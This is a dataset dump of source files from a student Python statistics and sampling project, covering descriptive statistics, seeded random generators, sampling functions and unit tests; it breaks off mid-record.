href=\"https://oscar-defelice.github.io/txt-clf-api.github.io/\">webApp</a></td>\n <tr>\n <!-- ** Link to source code -->\n <td><a href=\"https://github.com/oscar-defelice/TextClassifierModels/tree/main/CNN\">source</a></td>\n <!-- -->\n <!-- ** BERT TextClassifier -->\n <tr>\n <!-- Model -->\n <td rowspan=\"3\"><b><a style=\"white-space:nowrap; display:inline-block;\" href=\"https://github.com/oscar-defelice/TextClassifierModels/tree/main/BERT\"><div style='vertical-align:middle; display:inline;'>BERT TextClassifier</div></a></b></td>\n <!-- Colab badge -->\n <td><a href=\"https://colab.research.google.com/drive/1VSYpdUQ-v9SdBmOLeet8fPv3mkYRhGYf?usp=sharing\">\n <img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a></td>\n <!-- Description -->\n <td rowspan=\"3\">Classify texts with labels from the <a href=\"http://groups.di.unipi.it/~gulli/AG_corpus_of_news_articles.html\">AG news database</a> making use of an attention model, based on <a href=\"https://en.wikipedia.org/wiki/BERT_(language_model)\">BERT</a>.</td>\n <!-- Command Line key -->\n <td rowspan=\"3\"><code>python3 -m train -c config.yaml</code></td>\n <td rowspan=\"3\"> 93.95 </td>\n </tr>\n <tr>\n <!-- ** WebApp Link -->\n <td><a href=\"https://oscar-defelice.github.io/txt-clf-api.github.io/\">webApp</a></td>\n <tr>\n <!-- ** Link to source code -->\n <td><a href=\"https://github.com/oscar-defelice/TextClassifierModels/tree/main/BERT\">source</a></td>\n</table>\n"
},
{
"alpha_fraction": 0.5790202021598816,
"alphanum_fraction": 0.590091347694397,
"avg_line_length": 32.766353607177734,
"blob_id": "0d2d450ae7dafe41ec9db869f0df5d424cfce2bd",
"content_id": "359348624c5bff2a00dc109b67647630f5b5d8a1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3614,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 107,
"path": "/CNN/model.py",
"repo_name": "oscar-defelice/TextClassifierModels",
"src_encoding": "UTF-8",
"text": "###\n### model.py\n###\n### Created by Oscar de Felice on 23/10/2020.\n### Copyright © 2020 Oscar de Felice.\n###\n### This program is free software: you can redistribute it and/or modify\n### it under the terms of the GNU General Public License as published by\n### the Free Software Foundation, either version 3 of the License, or\n### (at your option) any later version.\n###\n### This program is distributed in the hope that it will be useful,\n### but WITHOUT ANY WARRANTY; without even the implied warranty of\n### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n### GNU General Public License for more details.\n###\n### You should have received a copy of the GNU General Public License\n### along with this program. If not, see <http://www.gnu.org/licenses/>.\n###\n########################################################################\n###\n### model.py\n### This module contains the model definition\n\"\"\"\n CNN Model for text classification.\n\"\"\"\n\n# import libraries\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Activation, Conv1D, Dense, Dropout, Embedding, GlobalMaxPool1D, MaxPool1D\n\n# default values\noptimizer = tf.keras.optimizers.Adam()\nloss = tf.keras.losses.CategoricalCrossentropy()\n\n\ndef buildModel( vocab_size,\n emb_dim,\n max_len,\n num_classes,\n dropout_rate,\n optimizer = optimizer,\n loss = loss,\n name = 'CNN_for_text_classification'):\n \"\"\"\n Function to build a CNN model for text classification.\n\n Parameters\n ----------\n vocab_size : int\n number of words in the vocabulary.\n\n emb_dim : int\n dimension of the embedding space.\n\n max_len : int\n maximal length of the input sequences.\n\n num_classes : int\n number of unique labels, it is also the number of\n units of the last dense layer.\n\n dropout_rate : int\n dropout hyperparameter, i.e. the probability of dropping\n a given node in the layer.\n dropout_rate = 0 is equivalent to no dropout.\n\n optimizer : optimizer object in Keras\n default : Adam optimizer\n\n loss : loss object in Keras\n default : Categorical Crossentropy\n\n name : str\n name of the model.\n default : 'CNN_for_text_classification'\n\n Return\n ------\n A Keras model object.\n\n \"\"\"\n # build the model\n\n model = Sequential(name = name)\n model.add(Embedding(vocab_size, output_dim = emb_dim, input_length=max_len))\n model.add(Dropout(dropout_rate))\n model.add(Conv1D(50, 3, activation='relu', padding='same', strides=1))\n model.add(MaxPool1D())\n model.add(Dropout(dropout_rate))\n model.add(Conv1D(100, 3, activation='relu', padding='same', strides=1))\n model.add(MaxPool1D())\n model.add(Dropout(dropout_rate))\n model.add(Conv1D(200, 3, activation='relu', padding='same', strides=1))\n model.add(GlobalMaxPool1D())\n model.add(Dropout(dropout_rate))\n model.add(Dense(100))\n model.add(Activation('relu'))\n model.add(Dropout(dropout_rate))\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n model.compile(loss=loss, metrics=['acc'], optimizer=optimizer)\n print(model.summary())\n\n return model\n"
},
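A quick smoke test of `buildModel` on one random batch; the hyperparameter values below are arbitrary, chosen only to exercise the call signature:

```python
import numpy as np
import tensorflow as tf
from model import buildModel

# Arbitrary small hyperparameters, chosen only to exercise the signature.
model = buildModel(vocab_size=5000, emb_dim=64, max_len=100,
                   num_classes=4, dropout_rate=0.2)

# One random batch: integer token ids in, one-hot labels out.
x = np.random.randint(0, 5000, size=(8, 100))
y = tf.keras.utils.to_categorical(np.random.randint(0, 4, size=8), num_classes=4)
model.train_on_batch(x, y)
```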
{
"alpha_fraction": 0.5370938777923584,
"alphanum_fraction": 0.5391046404838562,
"avg_line_length": 31.139455795288086,
"blob_id": "da01e6d471361abd909a78a3f90f5f98884fefd9",
"content_id": "f80ba39e1dc5c230a403dfcf426f6c9212062815",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9450,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 294,
"path": "/CNN/utils.py",
"repo_name": "oscar-defelice/TextClassifierModels",
"src_encoding": "UTF-8",
"text": "###\n### utils.py\n###\n### Created by Oscar de Felice on 23/10/2020.\n### Copyright © 2020 Oscar de Felice.\n###\n### This program is free software: you can redistribute it and/or modify\n### it under the terms of the GNU General Public License as published by\n### the Free Software Foundation, either version 3 of the License, or\n### (at your option) any later version.\n###\n### This program is distributed in the hope that it will be useful,\n### but WITHOUT ANY WARRANTY; without even the implied warranty of\n### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n### GNU General Public License for more details.\n###\n### You should have received a copy of the GNU General Public License\n### along with this program. If not, see <http://www.gnu.org/licenses/>.\n###\n########################################################################\n###\n### utils.py\n### This module contains helper functions for train and model.\n\n# import libraries\nimport tensorflow_datasets as tfds\nimport pandas as pd\npd.options.mode.chained_assignment = None # default='warn'\nfrom sklearn.metrics import classification_report\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nimport yaml\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils import to_categorical\n\nimport re\nimport string\nfrom datetime import datetime\n\nimport nltk\nnltk.download('punkt')\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\n\ndef getTokeniser(tokeniser_conf):\n if tokeniser_conf == 'keras':\n from keras.preprocessing.text import Tokenizer\n return Tokenizer(lower = True)\n else:\n raise ValueError(f'{tokeniser_conf} is not a valid option for tokeniser')\n\ndef loadConfig(configFile):\n with open(configFile, 'r') as stream:\n try:\n return yaml.safe_load(stream)\n except yaml.YAMLError as error:\n print(error)\n\ndef loadData(data, label_col, **kwargs):\n \"\"\"\n Function to download and store data into a dataset.\n\n Parameters\n ----------\n data : str\n path to data file (csv).\n\n label_col : str\n name of the column containing labels.\n\n Returns\n -------\n pandas dataframe containing data.\n n_classes : int\n nuber of classes for text classification.\n \"\"\"\n df = pd.read_csv(data, **kwargs)\n return df, len(df[label_col].unique())\n\ndef splitData( df, split_mode, split_value, random_state = None):\n \"\"\"\n Function to split data into train and validation sets.\n\n Parameters\n ----------\n df : pandas dataframe\n dataframe to be splitted\n\n split_mode : str\n string indicating whether the split is random or\n based on the value in a specific column\n\n split_value : float or str\n if split is random, which fraction of df has to be\n taken as validation set.\n if split is value based, the name of the column to\n look at.\n\n random_state : int\n seed to recover reproducibility in pseudorandom\n operations.\n\n Return\n ------\n df_train, df_test : pandas dataframes\n pandas dataframes containing train and test\n data respectively.\n \"\"\"\n\n if split_mode == 'random':\n df_train, df_test = train_test_split( df, test_size=split_value,\n random_state=random_state)\n elif split_mode == 'fixed':\n test_mask = df[split_value] == 'validation'\n df_test = df[test_mask]\n df_train = df[~test_mask]\n\n else:\n raise ValueError(f'{split_mode} is not a valid option for split_mode.')\n\n return df_train, df_test\n\ndef remove_punc(text):\n text = re.sub('\\[.*?\\]', '', text)\n text = 
re.sub('https?://\\S+|www\\.\\S+', '', text)\n text = re.sub('<.*?>+', '', text)\n text = re.sub('[%s]' % re.escape(string.punctuation), '', text)\n text = re.sub('\\n', '', text)\n text = re.sub('\\w*\\d\\w*', '', text)\n return text\n\ndef remove_stopwords(text):\n \"\"\"\n Functions to remove stopwords.\n \"\"\"\n list1 = [word for word in text.split() if\n word not in stopwords.words('english')]\n\n return \" \".join(list1)\n\ndef preprocess( df, text_col):\n \"\"\"\n Function to preprocess text data.\n\n Parameters\n ----------\n df : pandas dataframe\n dataframe containing text data.\n\n text_col : str\n column name containing text to be transformed.\n\n Returns\n -------\n NoneType, it updates df[text_col] with stopwords and punctuation\n removed.\n \"\"\"\n\n df[text_col] = df[text_col].apply(lambda x: remove_punc(x))\n df[text_col] = df[text_col].apply(lambda x: remove_stopwords(x))\n\n\ndef tokenise( tokeniser,\n df,\n text_col,\n max_len,\n padding = True,\n mode = 'train'):\n \"\"\"\n Function to operate the text-to-sequence conversion.\n\n Parameters\n ----------\n tokeniser : tokeniser object\n\n df : pandas dataframe\n dataframe containing text data in a column.\n\n text_col : str\n name of the column containing text to tokenise.\n\n max_len : int\n maximal lenght of the tokenised sequence.\n Texts in text_col longer than max_len are truncated.\n Shorter ones are padded with special token.\n\n padding : bool\n Set to True to add pad tokens to sequences shorter than\n max_len.\n default : True\n\n mode : str\n train mode indicates to operate the tokeniser fit on\n sequences.\n test mode just convert text to sequences.\n\n Return\n ------\n numpy array of shape (len(df), max_len)\n This contains a numerical sequence per row corresponding to the\n encoding of each df[text_col] row.\n In mode train returns also the vocab_size.\n \"\"\"\n preprocess(df, text_col)\n\n if mode == 'train':\n tokeniser = tokeniser\n tokeniser.fit_on_texts(df[text_col])\n vocab_size = len(tokeniser.word_index) + 1\n elif mode == 'test':\n tokeniser = tokeniser\n else:\n raise ValueError(f'{mode} is not a valid option.')\n\n tokenised_texts = tokeniser.texts_to_sequences(df[text_col])\n if padding:\n tokenised_texts = pad_sequences(tokenised_texts, maxlen=max_len)\n\n if mode == 'train':\n return tokenised_texts, vocab_size\n else:\n return tokenised_texts\n\ndef encodeLabels(df, label_col, mode):\n \"\"\"\n Function to apply the one-hot encoder to labels.\n\n Parameters\n ----------\n df : pandas dataframe\n dataframe containing data.\n\n label_col : str\n name of the column containing labels.\n \"\"\"\n\n encoded_labels = preprocessing.LabelEncoder()\n\n y = encoded_labels.fit_transform(df[label_col])\n \n return to_categorical(y)\n\ndef printReport(model, x_test, y_test,\n target_names = None,\n num_digits = 4,\n outfile = None):\n \"\"\"\n Function to print classification report.\n\n Parameters\n ----------\n y_true : list of float\n the test labels.\n\n y_predict : list of float\n model predictions for labels.\n\n label_names : list of str\n list of names for labels.\n If None there will appear numbers (indices\n of label list).\n default : None\n\n num_digits : int\n the number of digits to show in the report.\n default : 4\n\n outfile : str or NoneType\n A path to a file .txt to be filled with classification\n report.\n If None, prints on screen.\n default : None\n\n \"\"\"\n y_pred = to_categorical(np.argmax(model.predict(X_test), axis=1))\n\n if outfile != None:\n original_stdout = sys.stdout 
# Save a reference to the original standard output\n\n filename = outfile + datetime.now() + '.txt'\n\n with open(filename, 'w') as f:\n sys.stdout = f # Change the standard output to the file we created.\n print(classification_report(y_test, y_pred,\n target_names=label_names,\n digits = num_digits))\n\n sys.stdout = original_stdout # Reset the standard output to its\n # original value.\n\n else:\n print(classification_report(y_test, y_pred, target_names=label_names,\n digits = num_digits))\n"
},
{
"alpha_fraction": 0.8256880640983582,
"alphanum_fraction": 0.853210985660553,
"avg_line_length": 8.909090995788574,
"blob_id": "ed489fa5fed5e56c33d09d72830f2a6476f243f1",
"content_id": "b272c155db4afd2307f2ab79c6769aba98276ba5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 109,
"license_type": "permissive",
"max_line_length": 26,
"num_lines": 11,
"path": "/CNN/requirements.txt",
"repo_name": "oscar-defelice/TextClassifierModels",
"src_encoding": "UTF-8",
"text": "keras\nnltk\nnumpy\npandas\nregex\nsklearn\ntensorflow\ntensorflow-datasets==4.0.1\ntensorflowjs\ntransformers\npyyaml\n"
}
] | 5 |
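A minimal usage sketch for the tokenisation helpers in the oscar-defelice/TextClassifierModels record above, assuming the Keras `Tokenizer` from `tensorflow.keras` and a toy dataframe; the column name `text`, the `num_words` cap, and the sample sentences are illustrative assumptions, not taken from the repository (the helpers also assume the nltk stopword list has been downloaded via `nltk.download('stopwords')`):

import pandas as pd
from tensorflow.keras.preprocessing.text import Tokenizer

# Hypothetical two-row corpus; 'text' is an assumed column name.
df_train = pd.DataFrame({'text': ['Visit https://example.com now!',
                                  'Another 123 sentence with stopwords']})

tok = Tokenizer(num_words=1000)  # vocabulary cap chosen arbitrarily for this sketch
# 'train' mode fits the tokeniser and also returns the vocabulary size.
x_train, vocab_size = tokenise(tok, df_train, 'text', max_len=16, mode='train')

df_test = pd.DataFrame({'text': ['One more example sentence']})
x_test = tokenise(tok, df_test, 'text', max_len=16, mode='test')  # reuses the fitted tokeniser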
Duttp1998/IS218Project
|
https://github.com/Duttp1998/IS218Project
|
ecb265a1520e0b82ab141cea357e94ef9255524e
|
0a7520b62d196a7c5625f8bc068d44c12eeeaa12
|
50359eb4ece79e65f671b99196af814cd1fd3ec8
|
refs/heads/master
| 2021-02-13T20:11:25.862209 | 2020-03-14T02:34:17 | 2020-03-14T02:34:17 | 244,728,736 | 0 | 0 | null | 2020-03-03T19:55:22 | 2020-03-14T02:08:28 | 2020-03-14T02:13:02 |
Python
|
[
{
"alpha_fraction": 0.6696832776069641,
"alphanum_fraction": 0.6764705777168274,
"avg_line_length": 28.46666717529297,
"blob_id": "a4934f969830cb2cd9ab1d1479c31a98aed2dc0f",
"content_id": "346c42e86c4402b60ffd631889af80f3030308d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 442,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 15,
"path": "/PopulationSamplingfunctions/Crochran.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "from Statistics.Zscore import Zscore\nfrom PopulationSamplingfunctions.Margin_error import MarginError\nfrom Statistics.PopulationProportion import PopulationProportion\n\nclass Cochran:\n @staticmethod\n def cochran(data):\n z_s = Zscore.zscore(data)\n p_p = PopulationProportion.proportion(data)\n m_e = MarginError.margin(data)\n q = 1 - p_p\n\n cochran = ((z_s**2) * p_p * q)/(m_e**2)\n\n return cochran\n"
},
{
"alpha_fraction": 0.7027027010917664,
"alphanum_fraction": 0.7027027010917664,
"avg_line_length": 17.66666603088379,
"blob_id": "254937c03163ece80606b77e2a71e9c3309f069d",
"content_id": "2c716ea776d2dd4f8ef580de18b25d0cb5509ca5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 111,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/Statistics/Median.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import statistics\n\nclass Median:\n @staticmethod\n def median(data):\n return statistics.median(data)"
},
{
"alpha_fraction": 0.6220472455024719,
"alphanum_fraction": 0.6267716288566589,
"avg_line_length": 30.799999237060547,
"blob_id": "ea77b62e5c971f4c6588ce4f8bafd23f24e2c886",
"content_id": "aa8a0e950227fd596642c2e8b07750925eae662a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 635,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 20,
"path": "/Statistics/SampleCorrelation.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import math\nfrom Statistics.Standarddeviation import Standarddeviation\nfrom Statistics.Mean import Mean\n\nclass Samplecorrelation():\n @staticmethod\n def samplecorrelation(array):\n x = array[0]\n y = array[1]\n meanX = Mean.mean(x)\n meanY = Mean.mean(y)\n numerator = 0\n for index in range(len(x)):\n xdiff = x[index]-meanX\n ydiff = y[index]- meanY\n numerator += xdiff* ydiff\n covariance = numerator/ len(x)\n stdX = Standarddeviation.standarddeviation(x)\n stdY = Standarddeviation.standarddeviation(y)\n return covariance/(stdX*stdY)"
},
{
"alpha_fraction": 0.44871795177459717,
"alphanum_fraction": 0.4583333432674408,
"avg_line_length": 26.363636016845703,
"blob_id": "7ae0a80e5fdd4181112e33b2f92bde9f57d03aef",
"content_id": "3b02e62f8f33f5cec609bfcd3e8892a0235963b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 312,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 11,
"path": "/PopulationSamplingfunctions/Systematic_sampling.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "class SystemicSample:\r\n @staticmethod\r\n def systematicSample(array, n):\r\n result = []\r\n while n > 0:\r\n index = len(array) // n\r\n if index >= len(array):\r\n index -= 1\r\n result.append(array.pop(index))\r\n n -= 1\r\n return result\r\n"
},
{
"alpha_fraction": 0.6679999828338623,
"alphanum_fraction": 0.6679999828338623,
"avg_line_length": 22.809524536132812,
"blob_id": "6fa476e0989adf12beed9fd4348a0df468b21101",
"content_id": "2a36ba7f483e1ddcd995fc0d7e7d17ee5bfbe393",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 500,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 21,
"path": "/Random/Numbers.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import random\n\n\nclass Numbers:\n @staticmethod\n def randINT(lowest, highest):\n return random.randrange(lowest, highest)\n\n @staticmethod\n def randFLT(lowest, highest):\n return random.uniform(lowest, highest)\n\n @staticmethod\n def prandINT(lowest, highest, seed):\n random.seed(seed)\n return random.randrange(lowest, highest)\n\n @staticmethod\n def prandFLT(lowest, highest, seed):\n random.seed(seed)\n return random.uniform(lowest, highest)\n"
},
{
"alpha_fraction": 0.6794871687889099,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 30.200000762939453,
"blob_id": "1cb51476994969b95b9298015bbe7d9db1f825a4",
"content_id": "6dae60f1906c1950f230f91d3399f462029eb186",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 5,
"path": "/README.md",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "[](https://travis-ci.org/Duttp1998/IS218Project)\n\n# calculator\n\n# Statistics\n"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7058823704719543,
"avg_line_length": 16,
"blob_id": "53e398fd50ad8446a7cc1402b5ca6a6a79dd82b9",
"content_id": "304bcdb4f64c02d6938fc9fe5ce07e616095146a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 119,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 7,
"path": "/Statistics/Variance.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import statistics\n\n\nclass Variance:\n @staticmethod\n def variance(data):\n return statistics.variance(data)\n"
},
{
"alpha_fraction": 0.614262580871582,
"alphanum_fraction": 0.6191247701644897,
"avg_line_length": 26.045454025268555,
"blob_id": "86afff79b8a7891ef30cd6c9fa28023690cb0d9a",
"content_id": "3eb9e57b37a87954c72e3494bb0f356203db30a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 617,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 22,
"path": "/PopulationSamplingfunctions/Confidence_interval.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "from scipy.stats import sem\r\nfrom scipy.stats import t\r\nfrom Statistics.Mean import Mean\r\n\r\nclass ConfidenceInterval:\r\n @staticmethod\r\n def confidenceIntervalPopulation(confidence, data):\r\n ld = len(data)\r\n mn = Mean.mean(data)\r\n std_er = sem(data)\r\n high = std_er * t.ppf((1 + confidence) / 2, ld - 1)\r\n\r\n start = mn - high\r\n end = mn + high\r\n\r\n return start, end\r\n\r\n @staticmethod\r\n def confidenceIntervalSample(confidence, data):\r\n data = data\r\n cip = ConfidenceInterval.confidenceIntervalPopulation(confidence, data)\r\n return cip\r\n"
},
{
"alpha_fraction": 0.6752136945724487,
"alphanum_fraction": 0.6752136945724487,
"avg_line_length": 22.200000762939453,
"blob_id": "f1cb14a6f4d1a38eacc269e28344062dcbf0eba9",
"content_id": "6e53ff839c677fad6767b3a54a4a838943a23ccb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 5,
"path": "/Statistics/Zscore.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "\nfrom scipy import stats\nclass Zscore():\n @staticmethod\n def zscore(array):\n return stats.zscore(array)\n"
},
{
"alpha_fraction": 0.5186915993690491,
"alphanum_fraction": 0.5747663378715515,
"avg_line_length": 20.5,
"blob_id": "68b8d8aed1ea7fd807985e3f7a0b1a7def9d023f",
"content_id": "b24e083f0c7d3e53f057c91e3e103c8228c5738b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 214,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 10,
"path": "/Statistics/Quartiles.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass Quartiles:\n @staticmethod\n def quartiles(data):\n q1 = np.quantile(data, .25)\n q2 = np.quantile(data, .50)\n q3 = np.quantile(data, .75)\n return q1, q2, q3"
},
{
"alpha_fraction": 0.6831682920455933,
"alphanum_fraction": 0.6831682920455933,
"avg_line_length": 25.545454025268555,
"blob_id": "0fdfef48aa8d5a7445bd08d3f2e7fe0842aa686b",
"content_id": "37da1635fa79c1ba2e3a610256ac02d758f2b58c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 303,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 11,
"path": "/PopulationSamplingfunctions/Margin_error.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "from Statistics.Standarddeviation import Standarddeviation\r\nfrom Statistics.Zscore import Zscore\r\n\r\n\r\nclass MarginError:\r\n @staticmethod\r\n def margin(data):\r\n zs = Zscore.zscore(data)\r\n sd = Standarddeviation.standarddeviation(data)\r\n margin = zs * sd\r\n return margin\r\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6037036776542664,
"avg_line_length": 26,
"blob_id": "925c0a7b0ae7135f6b3fd85e1677278c4e7c1009",
"content_id": "705dab78dbae814ccad93493b29d1bb24a34ce3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 10,
"path": "/Statistics/Meandeviation.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "\nfrom Statistics.Mean import Mean\n\nclass Meandeviation():\n @staticmethod\n def meandeviation(array):\n mean = Mean.mean(array)\n numerator = 0\n for elem in array:\n numerator += abs((elem - mean))\n return (numerator / len(array))"
},
{
"alpha_fraction": 0.6032934188842773,
"alphanum_fraction": 0.6092814207077026,
"avg_line_length": 30.809524536132812,
"blob_id": "c05a88ac0b1902854d31ff79bb8de92462f05285",
"content_id": "a2a38472a60a0afe515abc238611a28e9563e739",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 668,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 21,
"path": "/Statistics/PopulationCorrelation.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import math\nfrom Statistics.Standarddeviation import Standarddeviation\nfrom Statistics.Mean import Mean\n\n\nclass PopulationCorrelation:\n @staticmethod\n def populationcorrelation(array):\n x = array[0]\n y = array[1]\n meanX = Mean.mean(x)\n meanY = Mean.mean(y)\n numerator = 0\n for index in range(len(x)):\n xdiff = (x[index] - meanX)\n ydiff = (y[index] - meanY)\n numerator += (xdiff * ydiff)\n covariance = (numerator / (len(x)) - 1)\n stdX = Standarddeviation.standarddeviation(x)\n stdY = Standarddeviation.standarddeviation(y)\n return (covariance / (stdX * stdY))\n"
},
{
"alpha_fraction": 0.511984646320343,
"alphanum_fraction": 0.6519654989242554,
"avg_line_length": 32.64516067504883,
"blob_id": "b24f827145db474eca35fc37ba0d7dc16da503cc",
"content_id": "6d4c38239b666498bde74d9971a5afa9594fcac5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1043,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 31,
"path": "/Tests/test_Random.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom Random.Elements import Elements\nfrom Random.Lists import Lists\nfrom Random.Numbers import Numbers\n\nclass MyTestCase(unittest.TestCase):\n def test_Random_Integer_Seed(self):\n self.assertEqual(9, Numbers.prandINT(1, 10, 30))\n\n def test_Random_Float_Seed(self):\n self.assertEqual(5.851734081452295, Numbers.prandFLT(1, 10, 30))\n\n def test_Random_IntegerList_Seed(self):\n self.assertEqual([9, 5, 1, 4, 5], Lists.prandINTL(1, 10, 5, 30))\n\n def test_Random_FloatList_Seed(self):\n self.assertEqual(\n [5.851734081452295, 3.6027679927574847, 1.2703321769601437, 6.882721785034857, 2.89007825994758]\n , Lists.prandFLTL(1, 10, 5, 30))\n\n def test_Random_Selection_Seed(self):\n arr = [1, 2, 3, 4, 5]\n self.assertEqual(5, Elements.prandElem(arr, 30))\n\n def test_Random_Multiple_Selection_Seed(self):\n arr = [1, 2, 3, 4, 5]\n self.assertEqual([5, 3, 5, 1, 5], Elements.prandElems(arr, 5, 30))\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.5836910009384155,
"alphanum_fraction": 0.5836910009384155,
"avg_line_length": 23.526315689086914,
"blob_id": "fceaed391e743b668907660bd27bed5142dee007",
"content_id": "93cae089306624236b15bfcee1bd0966b65eb6c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 466,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 19,
"path": "/Random/Lists.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import random\n\n\nclass Lists:\n @staticmethod\n def prandINTL(lowest, highest, n, seed):\n result = []\n random.seed(seed)\n for i in range(n):\n result.append(random.randrange(lowest, highest))\n return result\n\n @staticmethod\n def prandFLTL(lowest, highest, n, seed):\n result = []\n random.seed(seed)\n for i in range(n):\n result.append(random.uniform(lowest, highest))\n return result\n"
},
{
"alpha_fraction": 0.6242774724960327,
"alphanum_fraction": 0.6358381509780884,
"avg_line_length": 27.66666603088379,
"blob_id": "9387154965b1e51df461700409e1e872af11d8bf",
"content_id": "7299689b63407510d2d429772f051993d573719a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 6,
"path": "/Statistics/PopulationProportion.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "\n\nclass PopulationProportion:\n @staticmethod\n def proportion(data):\n subData = data\n proportion = len(subData)/(len(data) - 10)\n return proportion"
},
{
"alpha_fraction": 0.5364963412284851,
"alphanum_fraction": 0.5510948896408081,
"avg_line_length": 22.909090042114258,
"blob_id": "3afbcf5d97b5fe20381b0912b57441ccb7877ea2",
"content_id": "dd9d76c576bb04c37c3106a9131b03bcf1a59c13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 274,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 11,
"path": "/PopulationSamplingfunctions/Random_sampling.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "from Random.Numbers import Numbers\r\n\r\n\r\nclass RandomSample:\r\n @staticmethod\r\n def simpleSample(array, n):\r\n result = []\r\n while n >= 0:\r\n result.append(array.pop(Numbers.randINT(0, len(array) - 1)))\r\n n -= 1\r\n return result\r\n"
},
{
"alpha_fraction": 0.6187151074409485,
"alphanum_fraction": 0.6256983280181885,
"avg_line_length": 23.689655303955078,
"blob_id": "d11548fa009f62043da4d962fde259b09f9a992b",
"content_id": "fb47e2236d5e5aff377e3cf1b4c90b440bf2295e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 716,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 29,
"path": "/PopulationSamplingfunctions/Sample_size.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
